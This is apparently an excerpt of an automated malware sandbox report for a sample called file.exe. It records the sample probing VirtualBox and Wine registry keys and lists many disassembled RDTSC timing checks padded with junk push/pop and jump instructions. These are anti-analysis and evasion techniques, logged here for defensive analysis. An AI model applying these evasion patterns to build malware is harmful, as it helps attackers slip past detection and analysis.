          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D0E6 second address: 91D0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9724D second address: A97258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97258 second address: A9727D instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B19184AB6h 0x00000008 jbe 00007F6B19184AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jp 00007F6B19184AB6h 0x0000001a pop edi 0x0000001b jns 00007F6B19184ABAh 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9727D second address: A97287 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6B18E88FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97287 second address: A9728E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9728E second address: A97294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A852A9 second address: A852D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F6B19184ACBh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A852D7 second address: A85303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6B18E88FE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jnl 00007F6B18E88FE8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6B18E88FF1h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85303 second address: A85309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A962E5 second address: A962EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966B6 second address: A966C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jnl 00007F6B19184AB6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966C5 second address: A966F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6B18E88FEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6B18E88FEFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6B18E88FECh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A969F3 second address: A969F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A984BB second address: A984C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A984C3 second address: A9854D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 41CDD114h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F6B19184AB8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244F2BCh] 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F6B19184AB8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D1855h], edx 0x00000051 xchg eax, ebx 0x00000052 jmp 00007F6B19184AC9h 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98654 second address: A9866B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9870E second address: A9872B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B19184ABEh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop esi 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7DDB second address: AB7E08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF0h 0x00000007 jmp 00007F6B18E88FEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jng 00007F6B18E88FE6h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7E08 second address: AB7E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7E0C second address: AB7E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7F69 second address: AB7F6F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB80BB second address: AB80BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8386 second address: AB83C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F6B19184AC8h 0x0000000c jmp 00007F6B19184AC2h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 je 00007F6B19184AB6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB83C4 second address: AB83D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6B18E88FE6h 0x0000000a popad 0x0000000b jnp 00007F6B18E88FECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8562 second address: AB8571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6B19184AB6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8571 second address: AB8575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8813 second address: AB8830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B19184AC9h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8994 second address: AB89CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF9h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F6B18E88FF8h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB89CE second address: AB89D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8C96 second address: AB8CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F6B18E88FECh 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F6B18E88FEBh 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8CD3 second address: AB8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F6B19184AB6h 0x0000000d jmp 00007F6B19184ABCh 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8CEC second address: AB8CF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8E48 second address: AB8E67 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B19184AD1h 0x00000008 jmp 00007F6B19184AC5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8E67 second address: AB8E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8E6F second address: AB8E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8E73 second address: AB8E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8E79 second address: AB8E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81D43 second address: A81D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9688 second address: AB968E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A2E second address: AB9A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A33 second address: AB9A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A38 second address: AB9A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A3E second address: AB9A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6B19184ABAh 0x00000012 jmp 00007F6B19184ABCh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A61 second address: AB9A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A66 second address: AB9A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABBD2F second address: ABBD39 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A801BE second address: A801C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A801C2 second address: A801CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A801CC second address: A801E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABCB15 second address: ABCB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE2B0 second address: ABE2B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE2B5 second address: ABE2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE3F8 second address: ABE402 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B19184ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC41FA second address: AC4200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4200 second address: AC4204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4204 second address: AC4222 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F6B18E88FEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F6B18E88FEEh 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007F6B18E88FE6h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC438B second address: AC43A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6B19184AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d js 00007F6B19184AE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC43A2 second address: AC43AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6B18E88FE6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4559 second address: AC4560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4560 second address: AC4581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6B18E88FE6h 0x0000000a jmp 00007F6B18E88FF7h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4581 second address: AC4587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4B5D second address: AC4B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4B6A second address: AC4B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4B6E second address: AC4B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4B7A second address: AC4B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4B9C second address: AC4BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6B18E88FE6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC66F6 second address: AC6738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 1C709BAEh 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F6B19184AB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D190Eh], edx 0x0000002e call 00007F6B19184AB9h 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6738 second address: AC6751 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B18E88FEBh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6751 second address: AC6756 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6756 second address: AC676B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F6B18E88FECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC676B second address: AC676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC676F second address: AC679B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B18E88FE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F6B18E88FF0h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push esi 0x00000018 pushad 0x00000019 jc 00007F6B18E88FE6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6DFF second address: AC6E09 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B19184ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7372 second address: AC7377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7D04 second address: AC7D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9F35 second address: AC9F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAB34 second address: ACABA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B19184AC6h 0x00000009 popad 0x0000000a jnc 00007F6B19184AB8h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 mov esi, eax 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2831h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007F6B19184AB8h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a mov dword ptr [ebp+124774F4h], ecx 0x00000040 jmp 00007F6B19184ABFh 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 jbe 00007F6B19184AB6h 0x0000004f pop ecx 0x00000050 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB7D6 second address: ACB7DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB510 second address: ACB514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB514 second address: ACB533 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6B18E88FF0h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC137 second address: ACC13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23D4 second address: AD23D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23D8 second address: AD23DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23DE second address: AD2405 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F6B18E89008h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B18E88FF6h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4422 second address: AD4426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4426 second address: AD44C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F6B18E88FE6h 0x0000000d jo 00007F6B18E88FE6h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 jns 00007F6B18E88FF2h 0x0000001c nop 0x0000001d mov edi, ebx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F6B18E88FE8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b jmp 00007F6B18E88FF2h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F6B18E88FE8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c mov ebx, 0EAF1C0Dh 0x00000061 xchg eax, esi 0x00000062 jmp 00007F6B18E88FF3h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD44C8 second address: AD44D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD44D8 second address: AD44DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
